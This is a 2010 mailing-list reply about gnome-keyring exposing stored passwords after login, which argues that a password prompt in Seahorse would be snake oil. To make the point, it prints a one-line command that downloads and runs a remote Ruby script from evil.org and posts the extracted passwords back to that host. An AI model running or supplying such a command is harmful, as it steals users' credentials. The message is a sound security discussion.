Re: gnome-keyring Passwords freely available after login



On Mon, 13 Dec 2010 17:59:52 +0200,
Yaron Sheffer <yaronf gmx com> wrote:
> Seahorse is available on many machines, and any snoop can come by and 
> view the passwords. What Karl is suggesting (I believe) is that the 
> Seahorse *application* should require the login (or keyring?)
> password to be entered, even though as an application, it already has
> access to the passwords.
> 
> I agree with Karl that this would provide real security benefit, even 
> though a smarter attacker, or one who has more time, can install
> another application and access the same secrets.

Sorry, but it sounds like snake oil if Seahorse asks for a password.
It doesn't make the system more secure. It only seems like more security.
Of course it's possible to ask for some password, but there are enough
other ways to access the passwords.

In my opinion there are two options:
* Leave everything open and lock the screen every time
* Ask for a password on _every query_ of _every application_. But this
  makes you type passwords all the time. The applications should not
  cache the password for security reasons (e.g. locked memory). So you
  have to retype your "master" password every time your email program
  queries the server for new emails, every time you change the
  network, every time ...

If somebody doesn't believe me how easy it is to access all
passwords, I attached a short script.

It takes only seconds to extract all passwords:

ruby -e "$(curl http://evil.org/discoverall.rb )" | curl -d @-
http://evil.org/receive_passwords.php

In my opinion, users should learn to lock their screen if they
don't trust their environment. Gnome-keyring has many options to
protect passwords, e.g. automatic locking after some time. This can
really improve the security, in contrast to blocking some text fields
with a password.

Florian

Attachment: discoverall.rb
Description: application/ruby


